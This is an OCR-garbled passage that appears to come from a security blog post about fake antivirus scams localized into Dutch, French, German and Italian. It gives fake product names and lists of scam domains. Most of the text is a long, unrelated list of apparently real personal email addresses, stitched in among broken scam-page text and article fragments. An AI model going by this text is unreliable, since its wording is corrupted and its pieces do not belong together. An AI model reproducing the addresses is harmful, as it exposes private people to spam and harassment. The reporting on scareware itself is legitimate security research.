Summentntvirus le permee cortrotar ty PC Si su Comoutadora es su herramienta Tebele sa Seaeaiety -- 
Cobaana MSs vabos a, tanto en ef hogar COMO en la China, esta sohtIEN le encantare por Internet sin preocupaciones 
Messed Yomonarbie Pt em BUSTS OF rus y Malware, evtard la Mvasicn de tu Cen Sumeuietvens estacs 
. 7 brotegdo cortra 1960 boo oe 
amnenacat! 


Petts Se Prevectdad | Tarmenes ¢ Comtuenar| Combate do Copyright © 2008 Mem Genersbes Terhatiogion III0 ine Feder ber Goreches reservntes| 
Lisenas 


Would you believe that in times when top tier antivirus vendors are feeling the heat from the 
malware authors’ DoS attacks on their honeyfarms, and literally cannot keep up with their 
releases, someone out there is using an antivirus scanner that doesn’t really exist? It’s one 
thing to [1]promote fake security software in a [2]one-to-many communication channel by 
using a single language in a combination with [3]cybersquatted domains, and [4]entirely 
another to do the same in different languages. [5]Localization for anything malicious is 
already [6]taking place, as [7Jori[8]ginally anticipated [9]as an emerging trend back in 2006. 
The following currently active fake security software scams are promoted in Dutch, French, 
German, Italian, and you don’t get to download them until you hand out your credit card 
details, and once you do so, you'll end up in the same situation just like many other people 
did in the past. Some sample fake brands : 
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topolm63@gmail.com 
asd.y@freemail.hu 
jaycrilla@gmail.com 
netsbender@yahoo.com.sg 
sivakrishnabtech@gmail.com 
vuongl4@gmail.com 
phoenix2604@gmail.com 
myselflovjot@yahoo.com 
hacker.ivica@gmail.com 


jbucky1092@gmail.com 


rhyslerechillin@hotmail.co.uk 


iamonethreethreeseven@gmail.com 


deathstar2030@hotmail.com 
umang2203@gmail.com 


kill3r Of _nOObs@hotmail.com 


wagoman@hotmail.com 
Zoopamacacos@yahoo.com 
pat01z@hotmail.fr 
thinkfrancisco@hotmail.com 
satalketo@gmail.com 
mib200@gmail.com 
u_turn@live.fr 
claiton@gmail.com 
fireredlinkSOO00@yahoo.com 
me@myfuckingbusiness.tv 
boki85sd@gmx.com 
oogwaymailbox@gmail.com 
d-z_@hotmail.com 
rofles@scriptkitty.net 
embleite@gmail.com 
skillsgreaves@hotmail.com 
k-slee@hotmail.com 
professor0110@gmail.com 
mustabh@windowslive.com 
beaji@126.com 
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24.kapil@gmail.com 
spencer1606@gmail.com 
djmagicwhite@gmail.com 
agent59925692@spamcorptastic.com 
smokinghoth@live.com 
cyber12@freemail.hu 
bigboimikey@hotmail.co.uk 
nimit28ced@gmail.com 
bdingalu@yahoo.com 
grapesanyone69@gmail.com 
viistitchesvii@passthebowl.com 
g.a-O2@hotmail.com 

b 848@yahoo.com 
abod@9.cn 
werezecool@yahoo.com 
simply75@web.de 
knokepaul@webmail.co.za 
dittu.here@gmail.com 
myf4k31d@gmail.com 

lil but _mighty@hotmail.com 
thenavirio@live.com 
maipiolo@gmail.com 
alstorryann@gmail.com 
akasoepie@hotmail.com 
g3tm0n3y100@gmail.com 
mike- _77@hotmail.com 
reckahl@gmail.com 
darking764@gmail.com 

kb _ling@hotmail.com 
strange-wolf@hotmail.fr 
xax.lockdown@gmail.com 
lawrahh@hotmail.com 
psydelic7@hotmail.com 
yascoos@rapidoskop.net 
whizoun@gmail.com 
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dave@d-rnb.nl 
nightbladeO9@gmail.com 

kkk _hacker99@live.com 
drobinkin@mail.ru 
nasrudiin@gmail.com 
ashkingO8@googlemail.com 
narsimharaju _rs@yahoo.com.sg 
thend1@hotmail.es 
ohytheng@hotmail.com 
culjak.tomislaw@gmail.com 
ribijczykl4@gmail.com 
rarma2@hotmail.com 
bntptI@gmail.com 
admin@hackdevilz.com 
ghjkgkfgjkjlt@gmail.com 
kyle.cartan@gmail.com 
mahajan _344@yahoo.co.in 
blackigloo1984@gmail.com 
janbeerbom@yahoo.de 
maricdavor2005@hotmail.com 
arendhel@gmail.com 
innovatl01@hotmail.com 
djzzer0@live.com 
atvrider500@yahoo.com 

web _sailor@hotmail.com 
dark.light23@hotmail.com 
mr-aman@rogers.com 
ondemandemails@yahoo.com 
podweb _design@yahoo.com 
cashmonii220@yahoo.fr 
chrishinds123@hotmail.co.uk 
gustavocracker@gmail.com 
shocktoxic@yahoo.com 
wrestlingtom2005@yahoo.co.uk 


sajo_017@hotmail.com 
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culebrilla _18@hotmail.com 
bounda@junkmail.com 
emgghostnet@live.it 
sevicng@gmail.com 
wainwright114@hotmail.com 
red _ devil @live.com 
kellumson@hotmail.com 
mike- _7@hotmail.com 
reddevils allred@live.com 
alex-the-great@hotmail.it 
psychokiller@live.se 
sebek.master@gmail.com 
zOmbie@hush.ai 
ushack211@gmail.com 
xperenty@hotmail.com 
eplots@hotmail.com 
adm1nl1strat10n@hotmail.com 
brokenheartchief@gmail.com 
darkprompt@hotmail.com 
aerospace 23 umbra@hotmail.com 
guntur bklu@yahoo.com.sg 
r00t@hellstuck.co.in 
closer727@gmail.com 
venar303@gmail.com 
a@yopmail.com 
coolshafe941@gmail.com 
zeekyhbomb@live.com 
catirarica@gmail.com 
pi55ed@gmail.com 

i _fuked the _devilz_mrs@hotmail.com 
nicky _koe666@yahoo.de 
yeshack@gmail.com 
neutrino@dosbr.net 

mohit _pokemon@yahoo.com 
shadownetO@hotmail.com 
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dapol24@hotmail.com 
aaron-f@hotmail.com 

ziya x2@yahoo.co.in 
wassimo5@yahoo.fr 
hp@hptech.co.cc 
yolandalatina2001@yahoo.com 
willyhce@gmail.com 
roar2us@yahoo.com 
theupgrader8@yahoo.co.uk 
goodship22@yahoo.com 
softbangla@gmail.com 
killer _fairplay I33t@hotmail.com 
ds12@rogers.com 
ink2dust@aol.com 
twofun4u@msn.com 
cbxm@mailinator.com 
joey.r@msn.com 

133t haxorz@hotmail.com 
mausmust@hotmail.com 
demozoran@gmail.com 
ajinkya.d92@gmail.com 
dewittald@msn.com 
faza02@gmail.com 
natraj.kanoor@gmail.com 
lidvin@hotmail.com 
nugget23@gmail.com 
skatethug64@quepasa.com 
packetyou@gmail.com 
snakejena@gmx.de 
ceekay1@live.co.uk 
perlsyntax@hotmail.com 
toxicjojo@hotmail.fr 
foolingaroundmyplace@gmail.com 
donkeypoopoo@gmail.com 


poopooweee@gmail.com 
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op3rations@msn.com 
absoluteOQwnagel@gmail.com 
alliance.ver@gmail.com 
riba983@gmail.com 
zigal00@yahoo.fr 
zedthl23@gmail.com 
IIIlbob@gmail.com 
r0Otsecurity.depO0Oz@gmail.com 
cif-staff@hotmail. it 
wagdy.net@gmail.com 
agent67u@gmail.com 
aymenovic@hotmail.com 
abhe456@gmail.com 

rOx _rOx@live.it 
marcovit66@gmail.com 

cul _00786@yahoo.com 
tyasak@gmail.com 

deif 89@hotmail.com 

h3x _r0O0Ot@yahoo.com 
kallo.kala@yahoo.com 
fittirom@hotmail.com 
mikemikeoscar@yahoo.com 
sir _boxhead@hotmail.com 
magnetjones@hotmail.com 
ixeman@kpgamerz.org 
jackgolem1@gmail.com 
agent4wing@gmail.com 
eightballl@gmail.com 
assyriska@gmail.com 
sonic@sonic.idl.pl 
turbolentza82@yahoo.com 
h12.mehdi.hl12@gmail.com 
hero102308@yahoo.com 
on3@hotmail.it 
Ownagetotal12379@gmail.com 
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alexx _vic@hotmail.com 
julienhel4@yopmail.com 
yessinel@hotmail.com 
windpatrol@hotmail.fr 
veno _dino@hotmail.com 
mr _gza@phreaker.net 
bone _prison@hotmail.com 
beanl9@gmx.de 
pribib@hotmail.co.uk 
hm _team2003@hotmail.com 
tommyshannon7@gmail.com 
theirO07@yahoo.com 
andreaferrentino@hotmail.com 
carlosferreiracarlos@hotmail.com 
mrghostie@btinternet.com 
r0y4lty@syscore.pcriot.com 
mkmililgn@gmail.com 
pbh4dmin@gmail.com 
boncu _com@yahoo.com 
m4dsk1IIz@hotmail.com 
whydontyouusehotmail@gmail.com 
biggy _bang99@yahoo.ca 
lukasvielhauer@yahoo.de 
diogo _macedo9692@hotmail.com 
hmooood 89@hotmail.com 
rxpt78@gmail.com 
unknown1x@gmail.com 
nickwar3xx@gmail.com 
quark _uno@hotmail.com 
lindOmarlag@gmail.com 
hayraker@gmail.com 
callofkill@hotmail.fr 
hartmann79@hotmail.com 
user60163688@spamcorptastic.com 
hackthegenius@gmail.com 
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chuki _yosu@hotmail.com 
x3po@windowslive.com 
modf999@yahoo.com 
white.line@hotmail.com 
dariuscz@email.cz 
jeffrey.leue@hotmail.com 
sweatwindy@gmail.com 
goesinya666@yahoo.com 
karlzejtun@hotmail.com 
pioossl@gmail.com 
agriloan@gmail.com 
petas-120@hotmail.com 
user60195635@spamcorptastic.com 
dankenstein4d20@gmail.com 
yasser.200@hotmail.com 
kenmaster92@yahoo.com 
jakx.ppr@gmail.com 
cclean3r@gmail.com 
lukefaulkner@live.com 
kabout3r@yahoo.com 
nuffepuffe@gmail.com 
pisulat@aim.com 
jchoupimab@gmail.com 
akar gbg@hotmail.com 
darker@dark-hack.net 
jayben37@gmail.com 
skitzo@gmail.com 
chrome28@gmail.com 
paradosso@iol.it 
cyphex183@hotmail.com 
xuntamedmonkeyx@gmail.com 
cheeseman1208@gmail.com 
leot91@gmail.com 
kyle122591@gmail.com 
yodatak@hotmail.fr 
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andrejs@a-com.si 
xrs99@yahoo.com 
failisfail@trash-mail.com 
lilskaterpunk@gmail.com 
k@a-i-f.net 
introvert.hacker@gmail.com 
karavay@gmail.com 
excon01@gmail.com 
charcholt2@hotmail.com 
brilll4nt@yahoo.com 
sfbreton@me.com 
music19151@hotmail.com 
abduct.warz@yahoo.ca 
fd73278@gmail.com 
nipunaherath@hotmail.com 
bzyk15@gazeta.pl 
wifibre@gmail.com 


ra335@yahoo.com 


christopherwave6@hotmail.com 


amirdj@aim.com 
spice.prash@gmail.com 
muling@muling.lu 
szpuni@gmx.com 
admin@ipburn3r.com 
ulises2kK@gmail.com 
zerai@live.it 
etotakoo@yahoo.com 
neo-824@hotmail.com 
egils-222@inbox.|v 
jethro911@hotmail.com 
smirgliik@centrum.sk 
blckr@bleachhun.hu 
alex _brO7@yahoo.com 
jamatano1l23@gmail.com 


voice@cama6.com 
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jancic.ziga@gmail.com 
iskourbel@gmail.com 
kemalyener82@gmail.com 
rippin da _sea671@hotmail.com 
kastriot toto@hotmail.com 
k40t1x@hotmail.com 
hera9@buziaczek.pl 
linijalO2@yahoo.com 
sevalmemic32@hotmail.com 
hamill71@gmail.com 

zul zala@yahoo.com.my 
zhangyanlr@yeah.net 
mecu.aasa@gmail.com 
liberty.host@free. fr 

viata merge _inainte@yahoo.com 
allen.darrin@gmail.com 
jozgi@web.de 
snowmanrene@hotmail.com 
bones420usa@gmail.com 
backdoored@vista.aero 
zarifkhandaker@hotmail.com 
rsoloO000@hotmail.com 

hail mary 95@hotmail.com 
pyroreaper91@yahoo.com 
clarence.carino@gmail.com 
wacked@usa.com 
test2k320032@gmail.com 
theecho stoke@hotmail.com 
insu@linux-noob.com 
pimpsong@live.com 
eblissjoon@yahoo.com 
0.remove@gmail.com 

toni _juvel0@hotmail.com 
mrbigapple@hotmail.com 
wastemanagerr@aim.com 
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PCAntivirenLoesung 


SCHUTZEN SIE IHR 
SYSTEM VOR VIREN 
SOFORT! 

Ohne Viren leben! 


Hous 
Support 
Sofort kaufen 


Login 


IHR PROBLEM 
PCArOvren 


Specnazeprogrammen echitet 


SpyGuardPro; PCSecureSystem; AntiWorm2008; WinSecureAv; MenaceRescue; PCVirusless; 
LifeLongPC; NoChanceForVirus; MenaceMonitor; TrojansFilter; TrojansFilter; LongLifePC; 
KnowHowProtection; BestsellerAntivirus; PCVirusSweeper; AVSystemCare; AVSecurityPlus; 
AVSecurityPlus; PCAssertor; PoseidonAntivirus; TrustedAntivirus; PCBoosterPro; DefensiveSys- 
tem; GoldenAntiSpy; AntiSpywareSuite; AntiMalwareShield; AntivirusPCSuite; AntivirusForAll; 
TrustedProtection; NoWayVirus; AntiSpywareConductor; AntiSpywareMaster; TurnkeyAn- 
tiVirus; YourSystemGuard; 


Portfolio one: 


alfaantivirus.com 
antivirusalmassimo.com 
farrevirus.com 
fomputervagt.com 
figitalerschutz.com 
flmejorcuidado.com 
ferramentantivirus.com 
filterprogram.com 
filtredevirus.com 
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jeremydu62200@yahoo.fr 
philweb@hotmail.com 
karrash cc@hotmail.com 
lloyd@harrisony.com 

kevyin O01@hotmail.com 
chrishdman@gmail.com 
darknight630@gmail.com 
bryanbrtl28@yahoo.com 
thamekf2@gmail.com 
xxenox@gmail.com 
dilem42@live.fr 
i.m.a.d.0@hotmail.com 
windows _mss@yahoo.co.in 
p _j the koekoek@hotmail.com 
zeroyuri@gmail.com 
praveen@aexea.net 
senorsalsa99@gmail.com 
omgroflcopterftw@live.com 
princeali@hotmail.com 
slastrina@optusnet.com.au 
stonedman420@hotmail.com 
syazwankiller@hotmail.com 
seliver@sapo.pt 
an.stoinescu@bluewin.ch 
info@tsunamibilgisayar.com 
min.shinobi@gmail.com 
nkcezor@hotmail.com 
vitorkoelho@gmail.com 
nightspear238@hotmail.com 
mac.drizzle@yahoo.com 
xb4d@yahoo.com 
orikoshO0O@walla.com 

spiro _dt@hotmail.com 
demonicscience666@gmail.com 


anonymousddevil@rediffmail.com 
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thatwhatis@hotmail.com 
w00t@yopmail.com 

pepe _nike23@hotmail.com 
tylerhusted94@yahoo.com 
muppet@muppetalert.com 
koraxjr@gmail.com 

glitched ow@yahoo.co.nz 
nitrocrash@hotmail.co.uk 
captain-fly2008@hotmail.co.uk 
sroypet9@gmail.com 
public.enemy93@hotmail.com 
sykosiko@gmail.com 
ironjrackham@yahoo.com 
variant9@gmail.com 
warcraftl093@gmail.com 

dj _apocalypto@yahoo.com 
zulfikar m@hotmail.fr 
omaralqady@gmail.com 
dann-@msn.com 
kentonbomb@gmail.com 
dezeisenkelvoorforums@live.nl 
dir3kt@ymail.com 
binaryphr3k@gmail.com 
fierce69@live.com 
newbie.mm@gmail.com 
victor luisl1993@yahoo.com 
skinz@live.com 
mavromatis.lozay@gmail.com 
avinash.sit@gmail.com 
jewlion@gmail.com 
christian.perez77@yahoo.com 
zkdekp@gmail.com 
forallmyfakeshit@hotmail.com 
bugsy586@gmail.com 
zerOf@email.co.yu 
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1967alex1967@yopmail.com 
jeagz ko@yahoo.com 
zmarkb@live.com 

lethal _anthrax@hotmail.com 
r.fluttaz@gmail.com 
mehranphp@yahoo.com 
blazejwiecha@gmail.com 
alancerossi@hotmail.com 
neophitus@gmail.com 
xados@hotmail.it 
silverl163@gmail.com 
autumn _love6@yahoo.com 
forum _cat@yahoo.com 
dame _236@hotmail.com 
brinksterjames@yahoo.com.ph 
psynikola@gmail.com 
palmbr@gmail.com 


subhash.maji@ymail.com 


cableguy.lucifa.demon@gmail.com 


devmix@msn.com 
0x5h31!|@gmail.com 
user604@gmail.com 
vir69xtreme@gmail.com 
99xxyy99@gmail.com 
mark.krznaric@gmail.com 
I84this@gmail.com 
xplorer ex@hotmail.co.uk 
virgelo@gmail.com 
depu31@hotmail.com 

veo muertos@yahoo.com 
ch4rg3r2000@yahoo.com 
maxmuellerl19@gmail.com 
lamouroux.thomas@hotmail.fr 
dross@indiatimes.com 


cpshyamlal@gmail.com 
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res.bIh@gmail.com 
krohon@gmail.com 
info@budgetga.com 

bloodly _gate0910@live.no 
deathgame05@hotmail.com 
jamie@crushchecker.com 
trialless@gmail.com 
kaapa20369@gmail.com 
tomoates@gmail.com 
deathsoilder@gmx.de 

urani _online@hotmail.com 
ppaulvincent@hotmail.com 
fivedegree@hotmail.com 
peterng25@hotmail.com 
mellotron _elisa@hotmail.com 
mami58it@yahoo.it 

pancho _sk87@hotmail.com 
mo _on@live.fr 
spadeko@gmail.com 
cbeck527@gmail.com 
antfer.registros@gmail.com 
honguitov@hotmail.com 
profisher2007@yahoo.com 
messerchtmitt@yahoo.com 
ruffsnuff@gmail.com 
reconpatch@live.com 
toxicfaust@yahoo.gr 
mysqllv@gmail.com 
web.thony31@gmail.com 
franex@go2.pl 
sealpower1989@hotmail.com 
egyom@laposte.net 
ariyanster@gmail.com 
checkertotti@hotmail.de 
super.he.man@gmail.com 
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intoxicated.with.pride@gmail.com 
I3lack _lord2009@yahoo.com 
juhtuom@gmail.com 
johntash@gmail.com 
lightmyfire3@aol.com 
doppelwopper75@yahoo.de 
elango 018@yahoo.co.in 
agoenk.diar@gmail.com 
webmaster@drcomputer.de 
wayzokens@hotmail.com 
maplelxf@gmail.com 
chichoteremoto@hotmail.com 
dranzer OO06@yahoo.com 
mohebios@ciudad.com.ar 
wilsondarsun@msn.com 
amine _jordan23@hotmail.com 
rgayan@rocketmail.com 
dmoney7x@gmail.com 
cvvhackers@gmail.com 
vigensss@gmail.com 
noobzor@gmx.com 
thisismytrash@hotmail.com 
ammarosu@gmail.com 
joburlison23@comcast.net 
alvesta 55@live.com 
anandstar2008@live.com 
christianbarton999@hotmail.com 
hevan _on_earth@yahoo.co.in 
clockedism@gmail.com 
thevirus91@hotmail.co.uk 
garrett@whirry.org 
psplegendz@hotmail.com 
adrian.gramescu@gmail.com 
dimitar 33@hotmail.com 


12marcus@gmx.de 
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rexto1337@gmail.com 
j.muhamed@googlemail.com 
doc kain@yahoo.com 
cbutler.csf@gmail.com 
gabriel.tomaz3@gmail.com 
boypalmes@gmail.com 
volgyesidani@gmail.com 
worldoflol@live.com 
doricece@gmail.com 
costelmadrea@yahoo.com 
zer0O thunder@colombohackers.com 
najma _ah@yahoo.com 
dhamalmachade@yahoo.com 
idaunpacker@netscape.net 
neoviro@live.com 

lee eff 2k6@hotmail.co.uk 
blackhatrulez@gmail.com 
popofff@abv.bg 
samir.realmadrid@gmail.com 
gosterst@hotmail.com 
gr12die4@hotmail.com 
dieplanet@gmail.com 
chiuphoa@gmail.com 
hackin69@yahoo.com 
sobieski2@live.com 
aerajung@hotmail.com 
redon-@msn.com 

dylanger _trent@hotmail.com 
ayo1948@gmail.com 
3389@live.cn 
joshuabrown22@hotmail.co.uk 
bladerunner@info.com.ph 
oliver4581@sms.at 
hard-core-gamer@hotmail.com 
hendrazoel@gmail.com 
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djwickywicky@gmail.com 
folka09@gmail.com 

nut _9155@hotmail.com 
azeliba@hotmail.com 
stevenmcd@gmail.com 
seimadenkrull@aol.com 
schwindsascha@yahoo.de 
assistenzal@yahoo.it 
neshkom@yahoo.com 
eddiefriday888@gmail.com 
epost@mail.bg 
chestonmiller@gmail.com 
koalaw@verizon.net 
expert _winxp@yahoo.com 
dhruvarules@gmail.com 
rayden.adm@gmail.com 
onelife911@gmail.com 
cbpsmurf@hotmail.com 
echavira32@gmail.com 
robertoferrari4808@hotmail.com 
jheilmeier@live.com 
larsborg@gmail.com 
wapkidz@gmail.com 
donrulezz@gmail.com 
aim.less@btinternet.com 
budimir@gmail.com 
ethan604@gmail.com 
mail@musdi.web.id 
lordnugget@gmail.com 
nedim.hodzicl2@gmail.com 
matiyica@gmail.com 
rapid.hack.r@gmail.com 
fratersig@gmail.com 
md5ster@hotmail.com 
tim@tak44.com 
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blufish1966@yahoo. it 
maz.larry@gmail.com 
jakoba.jr@gmail.com 
narendravnk@rediffmail.com 
guitarplyrmw@gmail.com 
error.404@live.co.uk 
sinyster69@gmail.com 
golan5445@gmail.com 
lOrdf4t3@live.com 
miscstuff51@yahoo.com 
foxmindl|k@gmail.com 
lawlhi@bspamfree.org 
usr4567@gmail.com 
webmaster@familybusinessideas.com 
thaizeal@gmail.com 
chronicinmyblunt@yahoo.com 
cero.mano0@gmail.com 
yhadie69@yahoo.com 
avirusi@yahoo.com 
hoffman@poisk.md 
radio.gfx@gmail.com 
alehernandez15216@hotmail.com 
orange87@live.fr 
1006218612@qq.com 
shewlayce@hotmail.com 
kiran 20k@yahoo.com 
uname.a@gmail.com 
turjol@gmail.com 
josea.medina@gmail.com 
emailtosiddhartha@yahoo.com 
djkaja@gmail.com 
osdiur@mailinator.com 
yusufel2@hotmail.com 

i _tobbe@hotmail.com 

topnik _a@ymail.com 
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ufacek@quick.cz 
albertenriquez31@yahoo.com 
d4de.cc@gmail.com 

conrado _c12@hotmail.com 
jonraythan@hotmail.com 
midnightsky2004@hotmail.com 
kushal.k.agarwal@gmail.com 
jackstulswani@gmail.com 
689137@gmail.com 
knedlikO11@seznam.cz 
francescocisco@hotmail.it 
wahswashny@gmail.com 
lucasdu65@orange.fr 
frederick _arc@lycos.com 
ghost@64.co.za 
dinahack@hotmail.com 
waffadrunker@gmail.com 
mknezevicl3@yahoo.com 
ramsis3142002@yahoo.com 
ryan _mcguckin@hotmail.com 
miguel flores806@hotmail.com 
1p951@hotmail.com 
ciuSuSx@gmail.com 
mikeferd@hotmail.com 
hackds52@hotmail.com 
goodslife2009@yahoo.com 
nightmareuk@hotmail.com 
on@sakha.net 
coolsexysmart@yahoo.com 
chrisrae 495@hotmail.com 
kishorebits2010@gmail.com 
10n1z3d@w.cn 
rob.gallaher@comcast.net 
muslim7@ymail.com 


darkphazed@gmail.com 
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hamisharun@gmail.com 
boothroydster@gmail.com 
spimelime@gmail.com 
aditya292005@gmail.com 
rocky2005@gmail.com 
hackOr@ymail.com 
meong123@gmail.com 

nik _lachey@yahoo.co.uk 
pmnetworks@live.com 

flip _ house@hotmail.com 
ps2gamer@voila.fr 
luiz.bg@hotmail.com 
cru3l.b0y@gmail.com 
cocada007@gmail.com 
simnovrobi@gmail.com 
tinkode@gmail.com 

atrevino 1300@yahoo.com 
afenox@gmail.com 
jikhead@hotmail.com 
neinismypseudonym@gmail.com 
p _maximus _c@hotmail.com 
igoramaral26@hotmail.com 
rique _gob@hotmail.com 

sidd deshpande@rediffmail.com 
master.tinhky@gmail.com 
172@kpnmail.nl 
pagga8@gmail.com 
milesmeker@hotmail.com 
serseri-kral-ceza@hotmail.com 
zach.riddle@hotmail.com 
ulfarragnarsson@hotmail.com 
ell.patoon@hotmail.es 
gotroot247@gmail.com 
socalrar@gmail.com 


x.1.w@hotmail.com 
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geeninfectie.com 
harddrivefilter.com 
keineinfektionen.com 
longueviepc.com 
maseg.net 
nonstopantivirus.com 
pcantivirenloesung.com 
pcsystemschutz.com 
plutoantivirus.com 
psbeveiligingssysteem.com 
riendevirus.com 
securepcguard.com 
sekyuritikojo.com 
sistemadedefensa.com 
sumejorantivirus.com 
totaltrygghet.com 
viruscontrolleuer.com 
viruswacht.com 
votremeilleurantivirus.com 
zeusantivirus.com 


Portfolio two : 


advancedcleaner.com 
alltiettantivirus.com 


irus.com 
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info@cabikhosting.com 
apomisty@yahoo.co.jp 
sparky35@o2.pl 
vsolveit4u@gmail.com 
aww115@hotmail.com 
rudil56@yahoo.com 
evilmight@gmail.com 

artur _kurz@o2.pl 
pyros111@hotmail.com 
vbarbato@hotmail.it 
tgvvobm92@gmail.com 
ebonysamuna2@yahoo.co.uk 
ar_ i s123@hotmail.com 
lidenezretr@yahoo.com 
ryansturntowin@gmail.com 
arachidesalata@hotmail.it 


pop _black@mailinator.net 


mm532550@spamcorptastic.com 


i4xlol@gmail.com 
xsnstx@yahoo.com 
freeman2411@gmail.com 
slipknotgaming@web.de 
holdenvroomhead@hotmail.com 
oziescom@gmail.com 
gxantonyx@gmail.com 
santiagous84@hotmail.com 
ivica_vuc@yahoo.com 
krzysio626@gmail.com 
hun-globe@mailbox.hu 
bimsero@gmail.com 

nike99 __air@hotmail.com 
nicoknauer@ymail.com 
dmgteam@gmail.com 

chandu _mvsr2005@yahoo.com 


sensej321@gmail.com 


14123 


vector2@verizon.net 
binaryherb1991@gmail.com 
shadydsp@hotmail.com 
projectwannabO08@gmail.com 
dptw22@hotmail.com 
braidanl2@gmail.com 
tejaswi.yvs@gmail.com 

ice _t_lemon@hotmail.com 
gboyboygood@gmail.com 
maxbraams111@hotmail.com 
mrburns666@aol.com 
hackxOsavant@gmail.com 
enrico@benez.org 
ardhinet@yahoo.com 
www.homardfou@hotmail.fr 
blaze business@live.com 
3gitar@gmail.com 

manolo _xulo15@hotmail.com 
bootforfun@bootforfun.com 
zerOceral@gmail.com 

yuk _mister@hotmail.com 
triple3x@msn.com 
biggestladeva@hotmail.com 
slayer.1942@gmail.com 
karabela33@hotmail.com 
business.news2009@gmail.com 
tubbergen@hotmail.com 
tyufvsm3ulx4bev@jetable.com 
fran _utri_7594@hotmail.com 
vasquez.daniel69@gmail.com 
aperfect.chaos@gmail.com 
leogun007@gmx.at 
wlw70222@gmail.com 
teddsy@gmail.com 
ulitza.prospekt@gmail.com 
14124 


mambasta@hotmail.com 
nerostarl11@yahoo.com 
pengiranijam@yahoo.com 
mucikdjchris@hotmail.com 
pkmnsecure@aim.com 
marcdonny@ymail.com 
sims _justin91@yahoo.com 
quangbt@gmail.com 
19972454@qq.com 
justforsekob@gmail.com 
alexdu59dupdb@hotmail.fr 
blackposse@live.com 
tripz71@gmail.com 
boolel2@gmail.com 
theripper@wir-sind-cool.org 
dzanjin@gmail.com 
noise-hackz@hotmail.com 
programmer.cairns@live.co.uk 
mustaphamond.brave@gmail.com 
jonbons934@gmail.com 
haydarserkan@hotmail.com 
farbodmahini@yahoo.fr 
chrisfowles@sky.com 
princess _monicamail@yahoo.com 
paulo 19 op@hotmail.com 
badboys ya@hotmail.com 
ulrezaj44@gmail.com 
jonesy _yf _life@hotmail.co.uk 
unknownelementsO8@googlemail.com 
adam.honore@gmail.com 
qjx@mail.bg 
andrew _nureeko@yahoo.co.th 
phoeneous@cox.net 
ko-ftw@live.ca 
true2vision@aol.com 

14125 


gewrgiou93@hotmail.com 
yeahyeahyeahs91@gmail.com 
vengence-x@hotmail.com 
karlmc15@gmail.com 
masterrat@bigfoot.com 
hbdjoudjouhb@hotmail.com 
blindfuryl123@gmail.com 

i own _u_4eva@msn.com 
x.majstick.x@hotmail.com 
killer50090@hotmail.com 
astroursa@gmail.com 
kabby999@googlemail.com 
angelvs@sanctuarivm.com 
j3x@windowslive.com 
dyear20@optonline.net 
fyre bird@live.com 
prakasrel@gmail.com 
draker33@ymail.com 
system32 _ocx@yahoo.com 
ichhabezwei@hotmail.com 
yoursunboy@gmail.com 
suyashshinde8@gmail.com 
lipe96 @hotmail.com 
cloker@gmail.com 
billiup323@yahoo.co.uk 
davidshyn@rocketmail.com 
hackeranonyme@hotmail.fr 
darkn3ssking@gmail.com 
blackha3k@yahoo.com 
justanotherlucky@hotmail.com 
cherish82vn@yahoo.com 
mls577@aol.com 
luis.2023@hotmail.com 
mukesh.33@gmail.com 
schmiddydel2005@yahoo.de 
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pierowebdesigner@hotmail.com 
nashezbaernon.drizzt@gmail.com 
dailygupshup@hotmail.com 
lunch20ng@yahoo.com 

botzimp _666@hotmail.com 
martyjeplaaa@seznam.cz 
warezd00d@cooltoad.com 
wazzyah@yahoo.com 
alikoyalam@yahoo.com 
bibli200o3@gmail.com 
joe.w7810@yahoo.com 
info@it-doc24.com 
hitch@myrealbox.com 
kawasakigtr@hotmail.com 
admin@kustomdeals.com 
m1k3y55@yahoo.com 
63.61.64.6d.69.75.6d@gmail.com 
hamush.ba@live.com 
m4st3romg@gmail.com 
alyjack2002@hotmail.com 
tirupathiyadav@gmail.com 
mm1283763@spamcorptastic.com 
ht _rakispor@hotmail.com 
livelog@ymail.com 
email150843@20minutemail.com 
the.blackist@yahoo.com 
michi@michim.xenonserver.de 
hijorockero@hotmail.com 

ludoto 93@abv.bg 
esp2303@aol.com 
maradox-@live.com 
admin@hak9.com 

fire pain@web.de 
dbtds@hotmail.com 
cjh2446@gmail.com 
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manfred.123@gmx.de 
n4r1@live.com 

andi01l _@hotmail.com 
rajO064u@gmail.com 

xiah _baby@yahoo.com 

don _hacker 2009@hotmail.com 
peterlive@gmail.com 
digitalrevenge@aim.com 

mj _apoo@hotmail.fr 
virtualxterrorist@live.com 
lazharkaon@yahoo.fr 
hackingbunnies12@hotmail.com 
johndallback@yahoo.com 
madmangp@hotmail.fr 
hackeurgris@live.fr 
dw4rfs@gmail.com 

ondho _bmc@yahoo.com 
jessy lng@yahoo.com 
ifalcog9@hotmail.com 
teral000@gmail.com 
psysim@gmail.com 
blackmatch525@aim.com 
dudelookimonline@gmail.com 
fox3090@gmail.com 
getlegit@live.com 
benny92000@gmail.com 
johan loves _ferrari@hotmail.com 
johnt.oliver@murraystate.edu 
boilingptlLO0@yahoo.com 

lion cava@yahoo.com 
mohammedmuller@msn.com 
vacip@hotmail.com 
stephanv.n@hotmail.com 
sasorigamer@yahoo.de 


fmelende@ibw.com.ni 
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cmd.exe@haxs.org 
youforsure@hotmail.com 
quanglens@gmail.com 
cyberfrog69@web.de 
msalle3@hotmail.fr 
valentindu _44@hotmail.fr 
maikie87@gmail.com 
clynch6019@sbcglobal.net 
chribuh@hotmail.com 
bOsk3r@gmail.com 

ghost dog _13@pirates-w.org 
halogen22@web.de 
jigglefag@gmail.com 
inversegost@gmail.com 
sdrapid@hotmail.com 
kilmador@yahoo.de 
skyjedi.fr@gmail.com 
sevenguzel@gmail.com 
noob@mailinator.com 
akenan2007@hotmail.com 
lovermatt1991@hotmail.com 
jona _rsca@msn.com 
sinner.gameover@gmail.com 
p _pfff@hotmail.com 
humg.it.qn@gmail.com 
friphait@guerrillamailblock.com 
181forever@163.com 

joske hawaii@hotmail.com 
belemoih@gmail.com 
str3lok@live.com 
bluepill@gmail.com 
hanzanakbugis@gmail.com 
cylstc@163.com 
pegg2taylor@yahoo.com 
arito _11@msn.com 


14129 


alraesi@gmail.com 
i.road@live.com 
perlpowers@gmail.com 
data_bank _forsmart@yahoo.com 
netforce3000@gmail.com 
magikarptrainer@yahoo.com 
toxin7331@gmail.com 

pedro sousa56565@hotmail.com 
dscott@bright.net 
chargers19888@yahoo.ca 
ismail9 LO@yahoo.co.in 
kushstoner420@gmail.com 
lastmando@yahoo.com 
probott@gmail.com 
kikakzzz@gmail.com 
rubenchinlL@gmail.com 
mark@haktstudios.com 
sand2man@paran.com 
tharabidspork@aim.com 
ja3theonexv2@hotmail.com 
